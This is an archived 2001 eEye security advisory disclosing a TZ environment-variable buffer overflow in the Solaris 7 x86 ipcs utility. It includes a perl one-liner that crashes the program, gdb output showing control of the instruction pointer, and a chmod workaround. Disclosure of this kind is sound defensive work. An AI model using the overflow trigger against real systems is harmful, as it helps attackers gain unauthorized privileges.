Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: Marc Maiffret (marcEEYE.COM)
Date: Thu Apr 12 2001 - 20:07:08 CDT
Solaris ipcs vulnerability
April 11, 2001
Solaris 7 (x86)
Other versions of Solaris are most likely affected also.
Riley Hassell rileyeeye.com
We have discovered a buffer overflow in the /usr/bin/i86/ipcs utility
provided with Solaris 7. The problem exists in the parsing of the TZ
(TIMEZONE) environment variable. By exploiting this vulnerability an
attacker can achieve local sys group privileges. IPCS is used for gathering
information on active inter-process communication facilities. Exploitation
of this vulnerability would be very difficult, but not impossible.
bash-2.03$ TZ=`perl -e 'print "A"x1035'`
IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
Message Queue facility inactive.
T ID KEY MODE OWNER GROUP
m 0 0x500004d3 --rw-r--r-- root root
Semaphore facility inactive.
Segmentation Fault (core dumped)
Note: [buffer] is any 1036 (or so) character string. A's...
bash-2.03$ su root
# gdb /usr/bin/i86/ipcs core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
#0 0x41414141 in ?? ()
(gdb) info reg eip
eip 0x41414141 0x41414141
Sun Microsystems has been contacted. They are currently working on patches
for this and other related vulnerabilities eEye has discovered.
chmod –s /usr/bin/i86/ipcs
This will remove the setgid bit from /usr/bin/i86/ipcs, therefore if someone
does exploit this vulnerability, they won’t gain higher privileges.
ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, Loki, and last
but not least… Speakeasy.net
Copyright (c) 1998-2001 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alerteEye.com for
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security